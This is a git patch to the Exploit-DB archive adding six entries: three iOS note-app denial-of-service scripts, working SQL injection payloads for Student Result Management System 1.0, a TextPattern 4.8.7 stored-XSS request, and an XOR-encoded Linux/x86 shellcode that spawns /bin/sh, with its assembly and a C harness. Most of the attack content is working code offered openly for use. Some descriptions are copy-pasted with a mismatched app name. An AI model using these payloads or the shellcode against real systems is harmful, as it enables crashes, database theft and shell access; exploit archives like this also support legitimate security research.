From eaff7043e2c413df9b5f295777c64b46cd1145c0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 11 Jun 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-06-11 6 changes to exploits/shellcodes Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Student Result Management System 1.0 - 'class' SQL Injection TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) --- exploits/ios/dos/49978.py | 35 +++++++ exploits/ios/dos/49979.py | 35 +++++++ exploits/ios/local/49977.py | 35 +++++++ exploits/php/webapps/49974.txt | 30 ++++++ exploits/php/webapps/49975.txt | 186 +++++++++++++++++++++++++++++++++ files_exploits.csv | 5 + files_shellcodes.csv | 1 + shellcodes/linux_x86/49976.c | 74 +++++++++++++ 8 files changed, 401 insertions(+) create mode 100755 exploits/ios/dos/49978.py create mode 100755 exploits/ios/dos/49979.py create mode 100755 exploits/ios/local/49977.py create mode 100644 exploits/php/webapps/49974.txt create mode 100644 exploits/php/webapps/49975.txt create mode 100644 shellcodes/linux_x86/49976.c diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py new file mode 100755 index 000000000..ad51d7378 --- /dev/null +++ b/exploits/ios/dos/49978.py @@ -0,0 +1,35 @@ +# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) +# Date: 06-07-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608 +# Version: 3.0.6 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py new file mode 100755 index 000000000..79a3e41b6 --- /dev/null +++ b/exploits/ios/dos/49979.py @@ -0,0 +1,35 @@ +# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC) +# Date: 06-09-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/n-otes/id596895960 +# Version: 1.6.2 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py new file mode 100755 index 000000000..991b38e4e --- /dev/null +++ b/exploits/ios/local/49977.py @@ -0,0 +1,35 @@ +# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC) +# Date: 06-09-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619 +# Version: 4.2 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/php/webapps/49974.txt b/exploits/php/webapps/49974.txt new file mode 100644 index 000000000..e11e602fc --- /dev/null +++ b/exploits/php/webapps/49974.txt @@ -0,0 +1,30 @@ +# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection +# Date: 09.09.2020 +# Exploit Author: Riadh Benlamine (rbn0x00) +# Vendor Homepage : https://projectworlds.in +# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/ +# Version: 1.0 +# Category: Webapps +# Tested on: Apache2+MariaDB latest version +# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server. + +The vulnerable parameter uri: /srms/student.php?class= + +exploit: + + Parameter: class (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: class=-6346' OR 3657=3657#&rn=1 + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1 + + Type: UNION query + Title: MySQL UNION query (random number) - 7 columns + Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1 \ No newline at end of file diff --git a/exploits/php/webapps/49975.txt b/exploits/php/webapps/49975.txt new file mode 100644 index 000000000..3b8fc9934 --- /dev/null +++ b/exploits/php/webapps/49975.txt @@ -0,0 +1,186 @@ +# Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) +# Date: 2021/09/06 +# Exploit Author: Mert Daş merterpreter@gmail.com +# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip +# Software web: https://textpattern.com/ +# Tested on: Server: Xampp + +TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +TextPattern 4.8.7 is vulnerable; other versions may also be affected. + +Header + +-POST /textpattern/textpattern/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973 +Content-Length: 4574 +Origin: http://localhost +Connection: close +Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27 +Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85 + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="ID" + +2 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="event" + +article +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="step" + +edit +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="sPosted" + +1623260284 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="sLastMod" + +1623260295 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="AuthorID" + +admin +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="LastModID" + +admin +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Title" + +"> +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="textile_body" + +1 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Body" + +"> +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="textile_excerpt" + +1 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Excerpt" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Status" + +4 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Section" + +articles +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="override_form" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="year" + +2021 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="month" + +06 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="day" + +09 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="hour" + +19 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="minute" + +38 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="second" + +04 +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_year" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_month" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_day" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_hour" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_minute" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="exp_second" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="sExpires" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Category1" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Category2" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="url_title" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="description" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Keywords" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="Image" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="custom_1" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="custom_2" + + +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="save" + +Save +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="app_mode" + +async +-----------------------------1356274838636633083297009973 +Content-Disposition: form-data; name="_txp_token" + +346eeab2db04acf953d13529f6be3a74 +-----------------------------1356274838636633083297009973-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 238bda902..d5152a42c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6796,6 +6796,8 @@ id,file,description,date,author,type,platform,port 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios, 49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows, 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows, +49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios, +49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11355,6 +11357,7 @@ id,file,description,date,author,type,platform,port 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows, 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows, 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows, +49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44129,3 +44132,5 @@ id,file,description,date,author,type,platform,port 49971,exploits/php/webapps/49971.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2021-06-09,"Mert Daş",webapps,php, 49972,exploits/php/webapps/49972.txt,"WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)",2021-06-09,"Mesut Cetin",webapps,php, 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php, +49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php, +49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index acc8e60bb..b976354ed 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1037,3 +1037,4 @@ id,file,description,date,author,type,platform 49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64 49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86 +49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86 diff --git a/shellcodes/linux_x86/49976.c b/shellcodes/linux_x86/49976.c new file mode 100644 index 000000000..6033679bd --- /dev/null +++ b/shellcodes/linux_x86/49976.c @@ -0,0 +1,74 @@ +# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded) +# Date: 09/06/2021 +# Exploit Author: d7x +# Tested on: Ubuntu x86 + +/*** + shellcode with XOR decoder stub and fstenv MMX FPU + spawning a /bin/sh shell + + uses the fstenv GetPC technique to get the memory address dynamically + (alternative to jmp-call-pop) + + Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c + ./mmx-xor-decoder_eip + Shellcode Length: 70 + # id + uid=0(root) gid=0(root) groups=0(root) + # ps -p $$ + PID TTY TIME CMD + 24045 pts/4 00:00:00 sh + + *** Created by d7x + https://d7x.promiselabs.net + https://www.promiselabs.net *** +***/ + +/*** +; shellcode assembly + +global _start + +section .text +_start: + fldz + fstenv [esp-0xc] + pop edi ; put eip into edi + add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz) + + lea esi, [edi + 8] + xor ecx, ecx + mov cl, 4 + +decode: + movq mm0, qword [edi] + movq mm1, qword [esi] + pxor mm0, mm1 + movq qword [esi], mm0 + add esi, 0x8 + loop decode + + jmp short EncodedShellcode + +shellcode: + + decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d + EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d + +***/ + +#include +#include + +unsigned char shellcode[] = \ +"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a"; + +void main(void) +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int(*ret)() = (int(*)())shellcode; + + ret(); + +} \ No newline at end of file